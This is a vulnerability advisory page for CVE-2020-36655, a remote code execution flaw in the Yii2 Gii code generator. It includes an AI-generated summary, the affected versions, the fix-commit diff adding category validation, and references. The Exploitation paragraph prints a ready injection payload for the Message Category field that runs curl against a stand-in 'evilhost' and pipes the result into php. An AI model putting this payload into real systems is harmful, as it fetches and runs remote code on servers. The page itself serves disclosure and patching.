High severityNVD Advisory· Published Jan 21, 2023· Updated Apr 2, 2025

CVE-2020-36655

Description

Yii Yii2 Gii before 2.2.2 allows remote attackers to execute arbitrary code via the Generator.php messageCategory field. The attacker can embed arbitrary PHP code into the model file.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Yii2 Gii before 2.2.2 allows arbitrary code execution via the messageCategory field in Generator.php.

Vulnerability

Overview

CVE-2020-36655 is a remote code execution vulnerability in the Yii2 Gii module, a code generator for the Yii framework. The issue resides in the Generator.php file, where the messageCategory parameter is not properly sanitized before being used in generated model files. When the "Enable I18N" checkbox is selected, the messageCategory field becomes active, and an attacker can inject arbitrary PHP code into it. This lack of input validation allows the injected code to be written directly into the generated model file, leading to code execution on the server [1][2].

Exploitation

To exploit the vulnerability, an attacker must have access to the Gii module's web interface, which is often exposed in development or staging environments. The application must have a database configured and an existing table name specified. The attacker then selects the "Enable I18N" option and provides a malicious payload in the Message Category field, such as aaa', 'a'),];}}system('curl https://evilhost/b|php');__halt_compiler();. After previewing and generating the code, the malicious code is embedded into the model file. To trigger execution, the attacker can then use the Form Generator to load that model, which will evaluate the injected PHP code [2].

Impact

Successful exploitation allows a remote, unauthenticated attacker to execute arbitrary PHP code on the server. This can lead to full system compromise, including data theft, lateral movement within the network, or further attacks against production systems, as demonstrated in a real-world scenario where an attacker moved from a staging environment to production [2].

Mitigation

Patched versions are Yii2 Gii 2.2.2 and later. The fix, introduced in commit ed61e0d, adds validation to the messageCategory field, restricting it to alphanumeric characters and underscores [4]. Users should update to at least version 2.2.2 or apply the provided temporary patch [2]. Note that Gii is intended for development use only and should never be enabled in production environments.

References

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package	Affected versions	Patched versions
yiisoft/yii2-giiPackagist	< 2.2.2	2.2.2

Affected products

Yii/Yii2 Giidescription
Yii/Yii 2llm-fuzzy
Range: < 2.2.2
ghsa-coords
pkg:composer/yiisoft/yii2-gii
Range: < 2.2.2

Patches

ed61e0d85f43

Fix #433: Fix insufficient category validation

https://github.com/yiisoft/yii2-giiAlexander MakarovMay 6, 2021via ghsa

commit

2 files changed · +7 −3

CHANGELOG.md+1 −1 modified

@@ -7,7 +7,7 @@ Yii Framework 2 gii extension Change Log
 - Enh #450: Add behaviors merging, pagination example, sorting example, loading defaults for a model to CRUD controller (WinterSilence)
 - Enh #444: Updated reserved keywords in generator (WinterSilence)
 - Bug #439: Replace client-side generation of model class name with an AJAX request and a serverside implementation to take options into account (WinterSilence)
-
+- Bug #433: Fix insufficient category validation (samdark)
 
 2.2.1 May 02, 2020
 ------------------

src/Generator.php+6 −2 modified

@@ -389,8 +389,12 @@ public function validateNewClass($attribute, $params)
      */
     public function validateMessageCategory()
     {
-        if ($this->enableI18N && empty($this->messageCategory)) {
-            $this->addError('messageCategory', "Message Category cannot be blank.");
+        if ($this->enableI18N) {
+            if (empty($this->messageCategory)) {
+                $this->addError('messageCategory', "Message Category cannot be blank.");
+            } elseif (!preg_match('~\w+~', $this->messageCategory)) {
+                $this->addError('messageCategory', "Message Category is not valid. It should contain only alphanumeric characters and _.");
+            }
         }
     }

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/advisories/GHSA-3mpg-q26j-83j5ghsaADVISORY
nvd.nist.gov/vuln/detail/CVE-2020-36655ghsaADVISORY
github.com/yiisoft/yii2-gii/commit/ed61e0d85f43e23f79d7c9d1b4e5e5c09a32ce4bghsaWEB
github.com/yiisoft/yii2-gii/issues/433ghsaWEB
lab.wallarm.com/yii2-gii-remote-code-executionghsaWEB
lab.wallarm.com/yii2-gii-remote-code-execution/mitre

News mentions

No linked articles in our index yet.

cvss	0.455
epss	0.003
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000